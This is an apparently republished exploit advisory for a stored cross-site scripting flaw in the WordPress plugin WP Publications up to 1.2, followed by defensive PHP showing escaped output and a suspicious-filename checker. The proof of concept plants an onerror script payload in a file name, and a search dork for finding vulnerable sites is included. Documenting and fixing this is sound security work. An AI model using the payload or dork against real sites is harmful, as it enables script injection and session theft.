WordPress Plugin WP Publications <= 1.2 - Admin+ Stored XSS

2025.09.04
Risk: Low
Local: No
Remote: Yes
CWE: N/A

# Exploit Title: WordPress Plugin WP Publications <= 1.2 - Admin+ Stored XSS
# Google Dork: inurl:/wp-content/plugins/wp-publications/
# Date: 2025-07-15
# Exploit Author: Zeynalxan Quliyev, Ravan Poladli
# Vendor Homepage: https://wordpress.org/plugins/wp-publications/
# Software Link: https://downloads.wordpress.org/plugin/wp-publications.1.2.zip
# Version: <= 1.2
# Tested on: WordPress 6.5.3 / Linux (Apache)
# CVE: CVE-2024-11605

## Vulnerability Details

The WP Publications plugin for WordPress (versions <= 1.2) is vulnerable to **Stored Cross-Site Scripting (XSS)**. The plugin fails to escape file names before outputting them in HTML, so a high-privileged user (such as an administrator) can inject arbitrary JavaScript. The issue is exploitable even in WordPress configurations where the `unfiltered_html` capability is disabled (e.g., multisite setups).

---

## Proof of Concept (PoC)

1. SSH into the server and navigate to the plugin directory:

   ```bash
   cd /var/www/html/wp-content/plugins/wp-publications/
   ```

2. Create a BibTeX file whose name carries the payload:

   ```bash
   touch "<img src=x onerror=alert('XSS')>.bib"
   ```

3. Open the plugin's BibTeX browser at the following URL:

   ```
   https://example.com/wp-content/plugins/wp-publications/bibtexbrowser.php?frameset&bib=
   ```

4. The injected JavaScript runs, triggering the XSS payload:

   ```javascript
   alert('XSS');
   ```

---

## Impact

* Stored XSS (JavaScript) executes in the context of the admin panel.
* Bypasses the `unfiltered_html` protection in multisite environments.
* Can be used for privilege escalation, cookie theft, or injecting malicious content.

---

## Recommendation

Update to a version of the plugin that properly escapes file names before rendering them in the output. If no update is available, disable the plugin or sanitize file inputs manually.

---
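To make the recommendation concrete, the following PHP is an added example written for this page; it is not the plugin's code and does not reproduce `bibtexbrowser.php`. It renders a constructed list of `.bib` file names (including the payload name from the PoC) first the unescaped way, then with context-appropriate escaping, and adds a small audit helper that flags directory entries whose names contain HTML metacharacters. The function names and the sample listing are assumptions; `htmlspecialchars()` and `rawurlencode()` are standard PHP, and the WordPress equivalents named in the comments (`esc_html()`, `esc_attr()`) are real WordPress functions.

```php
<?php
// Added example (not the plugin's code): unsafe vs. escaped rendering of
// file names in HTML, plus an audit helper for suspicious names.

/**
 * Unsafe rendering: the file name is interpolated into HTML verbatim, which
 * is the class of defect the advisory describes. A name such as
 * "<img src=x onerror=alert('XSS')>.bib" becomes live markup in the page.
 */
function render_bib_list_unsafe(array $names): string
{
    $html = "<ul>\n";
    foreach ($names as $name) {
        $html .= "  <li><a href=\"bibtexbrowser.php?bib=$name\">$name</a></li>\n";
    }
    return $html . "</ul>\n";
}

/**
 * Hardened rendering: escape for the HTML body context, and URL-encode the
 * value placed in the query string before escaping it for the attribute
 * context. In a WordPress plugin esc_html() and esc_attr() play the same
 * roles as htmlspecialchars() does here.
 */
function render_bib_list_safe(array $names): string
{
    $html = "<ul>\n";
    foreach ($names as $name) {
        $text = htmlspecialchars($name, ENT_QUOTES | ENT_HTML5, 'UTF-8');
        $href = 'bibtexbrowser.php?bib=' . rawurlencode($name);
        $href = htmlspecialchars($href, ENT_QUOTES | ENT_HTML5, 'UTF-8');
        $html .= "  <li><a href=\"$href\">$text</a></li>\n";
    }
    return $html . "</ul>\n";
}

/**
 * Audit helper: return the names that contain characters meaningful in HTML
 * or that do not carry a .bib extension. An empty array means nothing was
 * flagged. Useful as a quick check on a plugin directory after an incident.
 */
function find_suspicious_bib_names(array $names): array
{
    $flagged = [];
    foreach ($names as $name) {
        if (preg_match('/[<>"\'&]/', $name) || !preg_match('/\.bib$/i', $name)) {
            $flagged[] = $name;
        }
    }
    return $flagged;
}

// Constructed sample directory listing (not real data): one ordinary entry
// and the payload file name from the PoC.
$sample = [
    'refs2024.bib',
    "<img src=x onerror=alert('XSS')>.bib",
];

echo "Unsafe output:\n", render_bib_list_unsafe($sample);
echo "Escaped output:\n", render_bib_list_safe($sample);
echo "Flagged names: ", implode(', ', find_suspicious_bib_names($sample)), "\n";
```

Run with `php example.php`. In the escaped output the payload appears as inert text (`&lt;img src=x onerror=alert(&apos;XSS&apos;)&gt;.bib`) and the audit helper lists it, while the ordinary entry passes. Escaping at output time is the fix that matters here, because the file is created on the filesystem rather than through an upload form, so input sanitization alone would not have prevented it.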

References:

* [CVE-2024-11605 on NVD](https://nvd.nist.gov/vuln/detail/CVE-2024-11605)
* [WPScan](https://wpscan.com/vulnerability/91c5ee70-2ff5-46cd-a0f5-54987fc2e060/)


Copyright 2025, cxsecurity.com
